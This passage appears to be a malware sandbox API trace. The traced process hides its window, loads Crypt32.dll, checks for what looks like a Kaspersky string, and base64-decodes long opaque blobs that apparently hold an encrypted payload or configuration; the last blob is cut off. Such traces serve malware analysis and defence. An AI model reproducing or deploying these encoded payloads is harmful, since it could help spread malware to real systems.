	[0054.238] CryptStringToBinaryA (in: pszString="nVjayBLYXNwZXJza3k=", cchString=0x13, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fed0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fed0, pdwSkip=0x0, pdwFlags=0x0) returned 0
	[0054.238] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0054.238] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0054.238] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0054.238] CryptStringToBinaryA (in: pszString="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", cchString=0x1ac0, dwFlags=0x1, pbBinary=0x0, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x0, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0054.238] CryptStringToBinaryA (in: pszString="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", cchString=0x1ac0, dwFlags=0x1, pbBinary=0x1272974, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x1272974, pcbBinary=0x12fee8, pdwSkip=0x0, pdwFlags=0x0) returned 1
	[0054.238] ShowWindow (hWnd=0x0, nCmdShow=0) returned 0
	[0054.238] LoadLibraryW (lpLibFileName="Crypt32.dll") returned 0x75610000
	[0054.239] GetProcAddress (hModule=0x75610000, lpProcName="CryptStringToBinaryA") returned 0x75645d77
	[0054.239] CryptStringToBinaryA (in: pszString="D9un1aFHR1JB70V1VEFp+Cs5RCRXeJSk5UhSQeF98QSyIv8H3dNXUEvXiWeDF81s/vw0wJCEI/PRO6+0qz6pwDC+k8cckroMhKnKJpzVL6uykHaUxAnHhqsNqf4wyqulUI3RJZC6rQyqvRCrwJAekLA+pa+0J4vqLq2+k0u/0VOQhKlUkt89tKuyCIPXL5PHhjH56hSpyqsYls4kspC6PYfpSYarwBe900erpa8Kksgcuq2+bP78tMKQhDfz0buttKspqcCwvJPHD5K6jIapyjWc1a+pspA1lMSJxYarVqn+sMirpWON0aqSuq1zqr2RqcCQVZCwvaevtDCL6q+vvpNUv9HUkoSpWZLfvLarsm+D17GRx4YX+eqKq8qrKJbOprCQuiuH6cuEq8AfvdPBqaWvP5LImritvi3+/KLCkIQ189GtrbSrPKnAqryTxwySupaGqco9nNWxqbKQN5TEl8WGq1qp/qrIq6UTjdGwkrqtLqq9h6nAkBWQsKunr7Qgi+pFrL6TXb/RPpGEqU2S31K1q7Ibg9dCkseGFfnqf6jKq1qWziCykLoRh+lNhqvAHb3TQ6ulrzKSyBi6rb4c/vwswJCEIvPRI6+0qwSpwCi+k8cUkroUhKnKJJzVN6uykCqUxBHHhqtNqf4oyqulJI3RMpC6rQqqffkx+Sr6L/MR2FCN0QGQuq0Cqr00q8CQCZCwGqWvtC2L6gqtvpNIv9FvkISpQZLfAbSrsiqD1xOTx4Y6+eooqcqrOZbOALKQuiCH6W2Gq8AWvdNjq6WvO5LIOLqtvhj+/AzAkIRWuMG6rbSrH5AQ1sgprPTRz5KEqWXfF8QaqxjnzBfd4a0Nq8CQKd1wwAqvHtzEKuXfzCDHhqtu5C7CZ6sP2MIR6anAQr+Tx36Sun6FqcpWnNVZqrKQRZTEf8aGqz+p/kLLq6VQjdFYkbqt5aq9b6rAkHuQsEOkr7RUi+pdrL6Tar/RJpGEqWaS30q1q7Iug9dakseGZvnqZ6jKq1qWzkmzkLpQh+kmh6vAb73TKqqlr0uSyE+7rb5t/vx1wZCEVvPReK60q02pwHG/k8d5krpLhanK/5zVbqqykKqUxErGhqvFqf5xy6ullo3RZZG6rTyqvVCqwJCTkLB+pK+0iovqbqy+k8O/0RORhKldkt99tauyV4PXb5LHhl356lSoyqvIls5ks5C6i4fpCYerwC290weqpa81kshcu62+B/78YMGQhN/z0W+utKvTqcBkv5PHWJK6WIWpyoOc1XOqspAXlMRVxoarI6n+bMurpcmN0XaRuq19qr1FqsCQbJCwaaSvtByL6nusvpN2v9EAkYSpD5LfELWrsiuD1wCSx4ZW+eo5qMqrqJbOF7OQuqiH6XyHq8AbvdNwqqWvHJLIKbutvrb+/BPBkISy89ESrrSrnqnAG7+Tx7mSu